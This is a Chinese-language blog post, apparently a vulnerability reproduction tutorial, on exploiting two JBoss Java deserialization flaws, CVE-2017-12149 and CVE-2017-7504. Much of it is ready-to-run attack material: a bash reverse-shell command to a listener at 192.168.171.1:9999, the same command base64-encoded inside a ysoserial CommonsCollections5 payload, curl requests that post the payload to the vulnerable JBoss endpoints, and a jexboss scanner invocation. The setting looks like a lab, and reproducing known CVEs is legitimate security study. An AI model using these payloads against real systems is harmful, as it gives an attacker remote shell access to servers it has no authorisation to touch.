jboss漏洞复现

什么是jboss

java中间件,类似于weblogic,webSphere等。可以理解成是一个加强版的可以实现EJB的tomcat。它的内部集成了tomcat对servlet处理的功能,而且支持EJB,不过weblogic的性能几乎全优于它,基本可以用weblogic代替。

1. JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)

原理

/invoker/readonly的post数据会被反序列化

利用

使用反弹shell命令配合ysoserial。

由于我们使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,我们需要用进行一次编码。工具地址如下:

http://www.jackson-t.ca/runtime-exec-payloads.html
bash -i >& /dev/tcp/192.168.171.1/9999 0>&1

在这里插入图片描述

执行命令生成恶意payload:

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4xLzk5OTkgMD4mMQo=}|{base64,-d}|{bash,-i}" > poc.ser

curl http://192.168.171.139:8080/invoker/readonly --data-binary @poc.ser

在这里插入图片描述


工具下载地址:https://github.com/joaomatosf/jexboss

python3 jexboss.py -u http://192.168.171.139:8080/                                          

在这里插入图片描述

2. JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

原理

/jbossmq-httpil/HTTPServerILServlet会接受我们post传递过去的数据并进行反序列化。

利用

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4xLzk5OTkgMD4mMQo=}|{base64,-d}|{bash,-i}" > poc.ser

curl http://192.168.171.139:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @poc.ser

在这里插入图片描述

参考文章

什么样的项目才会考虑使用JBoss、WebSphere、WebLogic等服务器?

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shanfenglan7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值